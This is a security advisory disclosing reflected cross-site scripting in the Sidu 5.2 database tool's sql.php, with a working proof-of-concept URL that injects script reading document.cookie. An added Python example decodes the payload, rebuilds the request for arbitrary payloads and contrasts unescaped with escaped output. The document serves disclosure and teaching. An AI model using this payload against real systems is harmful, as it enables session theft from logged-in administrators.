Affected Vendor: www.topnew.net/sidu/
Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt

Product:
========
Sidu version 5.2 is a web-based database front-end administration tool.

Advisory Information:
=====================================================
Sidu 5.2 is vulnerable to reflected cross-site scripting (XSS). The "sql"
parameter of sql.php is returned in the response without output encoding,
so a crafted link executes attacker-supplied JavaScript in the browser of a
Sidu user who is currently logged in. The proof-of-concept below pops an
alert containing document.cookie; the session cookie is readable by the
injected script unless it is flagged HttpOnly, and the same foothold can
issue any request the logged-in user is allowed to make.

Exploit code:
==============
http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E

Disclosure Timeline:
==================================
May 12, 2015: Vendor Notification
May 13, 2015: Public Disclosure

Severity Level:
===============
High

Description:
============
Request Method(s):
[+] GET

Vulnerable Product:
[+] Sidu 5.2

Vulnerable Parameter(s):
[+] sql=[XSS]

Affected Area(s):
[+] Admin of currently logged in user.

==============================
(hyp3rlinx)
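Added worked example (editor's addition, not part of the advisory and not Sidu's code): it decodes the published PoC URL to show the exact payload that reaches sql.php, rebuilds the same request shape around an arbitrary payload, and contrasts the vulnerable reflection with the hardened one. The reflect_unescaped / reflect_escaped functions are constructed stand-ins for sql.php's output (the advisory does not show the PHP source or the HTML context, so a plain <div> is assumed); is_reflected_unescaped is the response check a tester applies to confirm the finding.

```python
import html
from urllib.parse import urlparse, parse_qs, urlencode

# The PoC URL exactly as published in the advisory. Raw string: the "\n"
# sequences are literal backslash-n characters in the URL; the browser passes
# them through to the JavaScript string literal inside alert().
POC_URL = (
    r"http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By"
    r"%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E"
)


def extract_sql_param(url: str) -> str:
    """Return the percent-decoded value of the 'sql' query parameter,
    i.e. the string sql.php actually receives."""
    query = parse_qs(urlparse(url).query)
    return query["sql"][0]


def build_poc_url(base: str, record_id: str, payload: str) -> str:
    """Encode an arbitrary payload into the same GET shape as the advisory's
    PoC (id=...&sql=...). 'base' is the sql.php endpoint under test."""
    return f"{base}?{urlencode({'id': record_id, 'sql': payload})}"


def reflect_unescaped(value: str) -> str:
    """Constructed stand-in for the vulnerable behaviour: the parameter is
    written straight into the HTML body. (Assumption: the advisory reports the
    reflection but does not show sql.php's source or the exact HTML context.)"""
    return f"<div class=\"sql\">{value}</div>"


def reflect_escaped(value: str) -> str:
    """Hardened stand-in: entity-encode before rendering, the Python
    equivalent of PHP's htmlspecialchars($value, ENT_QUOTES)."""
    return f"<div class=\"sql\">{html.escape(value, quote=True)}</div>"


def is_reflected_unescaped(page: str, payload: str) -> bool:
    """The check a tester applies to the HTTP response: the payload comes back
    byte-for-byte, with its angle brackets and quotes intact, so the browser
    will parse the injected <script> element."""
    return payload in page


if __name__ == "__main__":
    payload = extract_sql_param(POC_URL)
    print("decoded payload:", payload)
    print("vulnerable:", is_reflected_unescaped(reflect_unescaped(payload), payload))
    print("hardened:  ", is_reflected_unescaped(reflect_escaped(payload), payload))
    print("rebuilt:   ", build_poc_url("http://localhost/sidu52/sql.php", "1", payload))
```

Against a live target the same check is applied to the real response body of the GET request while authenticated as a Sidu user; a payload that comes back with `&lt;script&gt;` instead of `<script>` is encoded correctly and is not exploitable in that context.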